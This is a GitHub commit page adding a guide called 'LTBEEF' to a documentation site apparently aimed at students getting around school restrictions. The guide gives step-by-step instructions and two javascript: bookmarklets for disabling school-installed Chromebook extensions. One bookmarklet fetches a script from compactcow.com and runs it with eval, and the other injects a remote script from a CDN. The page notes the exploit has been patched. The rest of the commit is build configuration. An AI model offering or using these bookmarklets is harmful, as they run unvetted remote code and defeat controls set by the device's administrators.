Skip to content

Commit

Permalink
add ltbeef
Browse files Browse the repository at this point in the history
  • Loading branch information
Inglan2 committed May 7, 2024
1 parent ac13ffb commit 6faaf58
Show file tree
Hide file tree
Showing 6 changed files with 46 additions and 3 deletions.
2 changes: 1 addition & 1 deletion .github/workflows/mkdocs-build.yml
Original file line number Diff line number Diff line change
Expand Up @@ -25,5 +25,5 @@ jobs:
path: .cache
restore-keys: |
mkdocs-material-
- run: pip install mkdocs-material
- run: pip install mkdocs-material mkdocs-glightbox
- run: mkdocs gh-deploy --force
36 changes: 36 additions & 0 deletions docs/exploits/extension/LTBEEF.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
# LTBEEF

LTBEEF (Literally The Best Exploit Ever Found) is an exploit found by Bypassi (Bypassi#7037) in September 2022 and is a great way to disable spyware installed on your Chromebook by your school.

## How to use LTBEEF

Use either of the two bookmarklets below. The instructions are the same for both.

1. Copy the Javascript code from either of the two bookmarklets below
2. Make a new bookmark on your Chromebook
3. Put the Javascript code in the URL section of the bookmark
4. Visit https://chrome.google.com/webstorex. (This is a 404 page, and that is ok.)
5. If that page does not work, you can just change the end of the URL to anything else, like https://chrome.google.com/webstoreYAAAAAAAAAAAAAAAY
6. Click on the bookmark you made
7. Switch off the extensions you don't want to have anymore.
8. You're done! The extension should now be disabled.

**Please note that this exploit has been patched for quite some time**

## Bookmarklets

### CompactCow GUI

![compactcowgui](compactcow.png)

```js
javascript:fetch(`https://compactcow.com/ltbeef/exploit.js`).then(data=>{data.text().then(text=>{eval(text)})});
```

### Ingot

![ingot](ingot.png)

```js
javascript:(function () {var a = document.createElement('script');a.src = 'https://cdn.jsdelivr.net/gh/FogNetwork/Ingot/ingot.min.js';document.body.appendChild(a);}())
```
Binary file added docs/exploits/extension/compactcow.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Binary file added docs/exploits/extension/ingot.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
4 changes: 3 additions & 1 deletion docs/exploits/index.md
Original file line number Diff line number Diff line change
@@ -1 +1,3 @@
# Exploits
# Exploits

Most from [3kh0/ext-remover](https://github.com/3kh0/ext-remover)
7 changes: 6 additions & 1 deletion mkdocs.yml
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,8 @@ nav:
- "Home": "index.md"
- "Exploits":
- exploits/index.md
- "Extension Removal/Bypass":
- exploits/extension/LTBEEF.md
- "Unblocked Sites":
- unblocked/index.md
- unblocked/gmae.md
Expand Down Expand Up @@ -70,4 +72,7 @@ markdown_extensions:
emoji_generator: !!python/name:material.extensions.emoji.to_svg
- admonition
- pymdownx.details
- pymdownx.superfences
- pymdownx.superfences

plugins:
- glightbox

0 comments on commit 6faaf58

Please sign in to comment.